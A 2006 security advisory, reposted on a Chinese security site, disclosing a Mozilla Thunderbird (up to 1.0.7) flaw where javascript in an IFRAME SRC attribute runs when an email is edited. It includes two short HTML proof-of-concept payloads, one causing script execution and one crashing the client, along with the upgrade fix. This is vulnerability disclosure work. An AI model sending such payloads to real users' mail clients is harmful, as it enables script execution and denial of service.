首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Thunderbird : Remote Code Execution & Denial of Service
来源:nono2357@sysdream.com 作者:nono2357 发布时间:2006-02-26  

Mozilla Thunderbird : Remote Code Execution & Denial of Service

//----- Advisory


Program : Mozilla Thunderbird
Homepage : http://www.mozilla.com/thunderbird/
Tested version : <= 1.0.7
Found by : nono2357 at sysdream dot com
This advisory : nono2357 at sysdream dot com
Discovery date : 2006/01/28


//----- Application description


Full-Featured Email

Simple to use, powerful, and customizable, Thunderbird is a full-featured
email application. Thunderbird supports IMAP and POP mail protocols, as well
as HTML mail formatting. Easily import your existing email accounts and
messages. Built-in RSS capabilities, powerful quick search, spell check
as you
type, global inbox, deleting attachments and advanced message filtering
round
out Thunderbird's modern feature set.


//----- Description of vulnerability


Thunderbird's WYSIWYG rendering engine insufficiently filters javascript
scripts. It is possible to write javascript in the SRC attribute of the
IFRAME
tag. This leads to execution when the email is edited (for instance when
replying to the email), even if javascript is disabled in the preferences.


//----- Proof Of Concept


* Javascript execution :

<html>
<body>
<iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>
</body>
</html>

* Denial of service (application crash) :

<html>
<body>
<iframe src="javascript:parent.document.write('Found by www.sysdream.com
!')"></iframe>
</body>
</html>


//----- Solution


Upgrade to version 1.5.

Download page : http://www.mozilla.com/thunderbird/all.html
Direct link :
http://ftp.mozilla.org/pub/mozilla.org/thunderbird/releases/1.5/


//----- Impact


Successful exploitation may lead to information disclosure (application
version, platform, user emails, user preferences, ...) or could crash the
application.


//----- Credits


http://www.sysdream.com
nono2357 at sysdream dot com


//----- Greetings


crashfr & the hackademy ...



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple Mac OS X / Safari __MACO
·Noah's Classifieds versions 1.
·Microsoft Windows Media Player
·PHPNuke versions 7.8 and below
·PHPKit <= v.1.6.1 release 2
·SCO UnixWare ptrace Call Binar
·Microsoft Color Management Mod
·ArGoSoft FTP Server Remote Buf
·Microsoft Windows Media Player
·Local privilege escalation exp
·Microsoft Windows Media Player
·iGENUS WebMail <= 2.0.2 rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved